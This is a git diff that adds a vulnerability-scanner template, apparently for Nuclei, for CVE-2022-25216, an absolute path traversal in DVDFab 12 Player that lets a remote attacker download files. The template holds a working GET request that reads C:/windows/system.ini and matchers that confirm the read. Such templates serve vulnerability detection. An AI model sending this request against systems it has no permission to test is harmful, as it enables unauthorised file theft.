diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml
new file mode 100644
index 0000000000..adef971fa1
--- /dev/null
+++ b/cves/2022/CVE-2022-25216.yaml
@@ -0,0 +1,35 @@
+id: CVE-2022-25216
+
+info:
+  name: DVDFab 12 Player/PlayerFab - Arbitrary File Read
+  author: 0x_Akoko
+  severity: high
+  description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
+  reference:
+    - https://www.tenable.com/security/research/tra-2022-07
+    - https://www.cvedetails.com/cve/CVE-2022-25216
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-25216
+    cwe-id: CWE-22
+  tags: cve,cve2022,dvdFab,lfi,lfr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: status
+        status:
+          - 200